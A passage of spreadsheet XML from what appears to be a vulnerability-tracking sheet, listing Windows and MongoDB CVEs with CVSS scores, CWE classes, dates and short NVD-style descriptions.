      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69536</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K280" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K281" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>The $regexFindAll expression can be used by an authenticated user who can run aggregation pipeline stages to crash a MongoDB server (mongod). Under certain specific conditions the  regex match can start in the middle of a multi-code-unit character, triggering an assertion during query execution.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB server's JSON Pointer parser used during $jsonSchema query filter processing. When a find command includes a specially crafted $jsonSchema filter field, the parser processes the input without enforcing adequate limits on iteration count or total allocation size, resulting in significant memory amplification. Under concurrent request load, the cumulative memory consumption can exhaust available heap memory, causing the server's out-of-memory handler to terminate the mongod process and deny service to all connected clients.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's 2dsphere index key generation that can cause a server crash due to a null pointer dereference. When a specially crafted GeoJSON document is inserted into a collection with a 2dsphere index, an inconsistency in geometry parsing can leave an internal object in an invalid, partially initialized state. During subsequent index key generation, access to this improperly initialized object results in a null pointer dereference that terminates the mongod process. An authenticated user with write access can use this to cause a denial of service.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K284" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>A security issue was discovered in MongoDB where an authenticated user with readWrite privileges could crash the mongod server process. By specifying a custom WiredTiger storage configuration option with an incompatible value during collection creation, a user could cause a type confusion in the storage engine layer. When documents were subsequently read from the misconfigured collection, the resulting mismatch in expected data format led to corrupted memory interpretation and a server crash. The crafted collection configuration persists across restarts, requiring manual operator intervention to remediate.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K285" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>A flaw in MongoDB's JSON Schema validation error generation code allows an authenticated user with readWrite privileges to crash the mongod server. When a BSON document containing an array with a malformed numeric field name fails a $jsonSchema items type constraint, the error generation path performs unsafe numeric conversion on the user-controlled field name without proper exception handling, resulting in an uncaught exception that terminates the server process. This is possible because incoming wire protocol BSON validation does not enforce that array element field names are valid, in-range numeric indices.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server's storage engine integration layer allows an authenticated user with collection creation privileges to cause a persistent denial of service. Insufficient validation of user-supplied storage configuration options permits values that, once persisted to durable metadata, trigger a fatal assertion failure when the metadata is subsequently read by diagnostic operations. The corrupted metadata persists across server restarts and is replicated to other cluster members, requiring manual operator intervention to restore service.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with write privileges to trigger a persistent fatal assertion crash by sending specially crafted retryable write commands. The crash state is durably persisted, causing the server process to repeatedly crash on restart and potentially propagating to additional nodes in a sharded cluster. Manual intervention is required to restore service availability.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's diagnostic reporting interface allows an authenticated user with monitoring privileges to access insufficiently protected credentials from concurrent administrative operations. The same credentials are properly redacted in server log output, but the diagnostic interface omits equivalent redaction. Successful exploitation requires a valid authenticated session with monitoring-level permissions and results in exposure of cleartext credentials that could enable impersonation of other users, including privileged accounts.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server aggregation framework allows an authenticated user with limited read privileges to bypass view-level authorization checks and access data from unauthorized collections when Atlas Search features are in use. The issue stems from insufficient validation of an internal command parameter that can be set by external clients, causing a security check to be improperly skipped.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>MongoDB Server contains an incorrect authorization vulnerability in the aggregation framework. An authenticated user with minimal privileges can craft a specially formatted aggregation request that causes the server's authorization subsystem to evaluate a different operation than what is actually executed, resulting in unauthorized read access to collection data within the target database.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82076</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the query planning component of MongoDB Server can allow an authenticated user with ordinary database-level read/write privileges to bypass an internal resource limit. Submitting a specially crafted query causes the server to consume memory without bound during query planning, and the resulting exhaustion terminates the server process. This may result in a denial of service affecting all databases served by the affected node.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50349</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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92" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62694</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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93" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68824</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K294" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
